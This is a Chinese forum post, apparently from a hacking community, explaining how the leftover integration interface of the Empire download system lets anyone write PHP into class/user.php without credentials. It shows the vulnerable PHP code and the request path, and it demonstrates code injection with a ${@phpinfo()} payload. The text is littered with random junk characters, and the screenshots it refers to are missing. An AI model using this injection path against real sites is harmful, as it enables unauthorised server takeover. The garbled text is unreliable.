这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
% }+ O- R; X' o# j& o$ A! G9 L0 F
. ` s: x4 [4 |" Q4 V8 W* G- ~* m7 f7 s2 G+ Q9 W8 h
这是帝国的一套下载系统 如图
2 T/ M, e8 n& i0 a6 y$ ^ps(不需要任何账户和密码,直接写shell) # V- g9 r( N9 I# K: a3 F
由于很多站是由于下载要整合discuz 等等一些论坛..... ~+ [' m/ i/ O# {; B7 b5 d
! q9 r6 u: _- |3 _! c" w: B而帝国他又有一个万能接口,如图
9 S( Q7 ~) R( W+ }3 o: r+ w9 I
4 r+ b4 w8 q) M$ ~, b b# @
- ~6 ]5 w( r1 ?而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
! G/ o, k% h- t* A1 X* ]
" f* V, N6 e& I# L1 F) h8 z/ r @5 I当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪. @; _( T) i7 P7 b1 ^6 E
3 P+ p, n D0 |8 U E2 r在data/fun.php中的15行
3 w4 H1 v a* x4 k0 m0 w
! ]+ }; e; i% x4 L$ T8 ~( T% @我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
2 B5 @/ g0 A. j8 y8 v# l17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干/ x/ W( b. o; f2 O8 b+ y. y6 y
# v7 U1 Q* j) {0 ^& p
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);, w$ {. @# _6 V/ ^+ u4 x
8 t+ j4 n+ z; @7 g& J, X& b
他将传进来的变量进行了切割,然后赋给了$filetext
1 C @& D! J5 `0 k* k, ?& a8 [9 A/ A1 _" m$ b
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了% n, s2 M9 F, ?! a
3 _! [6 D m% h G4 ?我们看看写入的结果,随便填一个 # q6 D3 w. @* u1 v- F
@' a3 i1 e1 Y
7 B. h/ i! w: ]" `; L* A9 w- p/ ] X$ S+ e p' K ~+ B
+ b5 y- \! Z1 K! x! o" M& @7 s `; W% ~( }$ Q* c
2 B" W9 r' U6 `% r6 m
; Y6 `; b% D7 o, Q8 f$ q
3 W, b& G) J( Q" W, \/ T, u: O/ {: q! |8 L& p+ I1 V7 |
9 Y: V ~8 Q( I$ k6 H1 D" Y% ~+ u
# m" b( Q# P1 Y% l) W& i
& l1 E/ q# t1 q# {: f* }" B4 r2 ~
" X; D' u! y, O6 J! ~
( N# d) j$ k9 i$ e! ^) Z, B" [, z9 K: F l) R% F( d
& g+ \+ A6 e( Q( t5 N, ~7 }. {
# Q" w! I v- Z" |) w5 g% J4 f: H: d* k/ k& U d5 q$ D
& ?# `8 _0 d/ \$ t, L) H: {
; l/ \6 f) E. ]) h8 G2 m
4 K, r2 y6 H* r! d- M所以我们淫荡点,写个${@phpinfo()}试试 3 V6 s2 I# q5 o( }* v3 c4 E* E6 f
然后访问以下class/user.php这个文件( o' }( ]. T; N/ _0 ]
日了吧
& a h8 D1 s3 e% @& x2 [+ h* U
2 ^" X. Y& C* Y, G9 i7 Q8 D: k$ B9 O; t8 J* l0 R* o
/ x {) j1 G0 v2 i+ T
* v3 s* Z% _! m+ d! Y
2 B3 _4 W7 e1 _0 ^ |